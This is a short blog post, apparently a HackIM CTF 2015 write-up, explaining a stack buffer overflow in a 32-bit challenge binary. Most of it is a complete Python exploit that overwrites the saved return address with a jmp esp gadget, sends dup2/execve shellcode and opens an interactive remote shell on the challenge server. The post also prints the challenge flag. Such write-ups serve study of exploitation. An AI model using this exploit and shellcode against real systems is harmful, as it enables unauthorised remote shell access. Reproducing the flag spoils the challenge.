Friday, January 16, 2015

HACKIM CTF 2015 - Exploitation 1

Exploitation 1 was a 32 bit ELF without NX protection. The vulnerability is a buffer overflow in stack using echo command during sprintf() call at 0x080489BF. snprintf() copies 8191 bytes of data supplied by read() into 0x78 byte buffer causing the overflow. Suppling 122 bytes along with echo: [6 bytes] will overwrite the saved EIP. Also there is a nice jmp esp gadget to bypass ASLR. Below is the exploit
#!/usr/bin/env python

import socket
import telnetlib
import struct

ip = "127.0.0.1"
ip = "54.163.248.69"
port = 9000

dup    = '31c031db31c9b103fec9b03fb304cd8075f6'.decode('hex')
execve = '31c9f7e151682f2f7368682f62696e89e3b00bcd80'.decode('hex')
shellcode = dup + execve

soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
soc.connect((ip, port))
soc.recv(16)
jmp_esp = 0x080488b0

payload  = "echo "
payload += "A" * 118
payload += struct.pack("<I", jmp_esp)
payload += shellcode
soc.send(payload + chr(0xa))

print "[*] Shell"
s = telnetlib.Telnet()
s.sock = soc
s.interact()
Flag for the challenge is aleph1-to-the-rescue++

No comments :

Post a Comment